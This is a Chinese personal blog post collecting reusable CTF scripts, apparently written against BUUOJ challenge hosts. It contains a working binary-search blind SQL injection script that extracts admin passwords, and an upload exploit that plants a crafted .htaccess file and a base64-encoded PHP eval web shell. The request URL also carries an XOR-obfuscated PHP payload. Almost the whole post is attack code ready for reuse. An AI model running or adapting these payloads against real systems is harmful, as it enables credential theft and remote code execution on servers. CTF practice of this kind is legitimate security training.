记录一下常用的一些脚本
SQL 二分盲注
import requestsfrom time import sleepurl = "http://8fd845b8-4242-4441-ab34-57c8386d5faf.node3.buuoj.cn/backend/content_detail.php" proxies = { "http" : "127.0.0.1:8080" } def attack (cur, mid="" ) : payload = "0^(ascii(substr((select(group_concat(password))from(admin)),%d,1))>%d)" % (cur, mid) data = { "id" : payload } res = requests.get(url, params=data, proxies=proxies) if res.status_code == 429 : print('too fast' ) if "content" in res.text: return True else : return False def try_length () : for i in range(1 , 10 ): if attack(i): print(i) break sleep(0.02 ) def main () : flag = "" for i in range(1 , 22 ): end = 127 start = 31 mid = (end + start) // 2 while end > start: if attack(i, mid): start = mid + 1 else : end = mid mid = (end + start) // 2 sleep(0.02 ) flag += chr(mid) print(flag) if __name__ == "__main__" : main()
SSTI 判断图
.htaccess 上传 getshell
import requestsimport base64url = r"http://2eab5f94-4cfd-41dc-ac5d-6cda977d7ce4.node3.buuoj.cn//?_=${%fe%fe%fe%fe^%a1%b9%bb%aa}{%fe}();&%fe=get_the_flag" SIZE_HEADER = b"\x00\x00\x8a\x39\x8a\x39" htaccess = SIZE_HEADER + b""" AddType application/x-httpd-php .cc php_value auto_prepend_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_2c67ca1eaeadbdc1868d67003072b481/shell.cc" """ files = [ ("file" ,(".htaccess" , htaccess, "image/gif" )) ] proxy = {"http" : "127.0.0.1:8080" } res = requests.post(url, files=files, proxies=proxy).text print(res) shell = SIZE_HEADER + b"00" + base64.b64encode(b"<?php eval($_GET['cjm00n']);?>" ) files = [ ("file" ,("shell.cc" , shell, "image/gif" )) ] proxy = {"http" : "127.0.0.1:8080" } res = requests.post(url, files=files, proxies=proxy).text print(res)
作者: cjm00n 地址: https://cjm00n.top/CTF/useful-scripts.html 版权声明: 除特别说明外,所有文章均采用 CC BY 4.0 许可协议,转载请先取得同意。
评论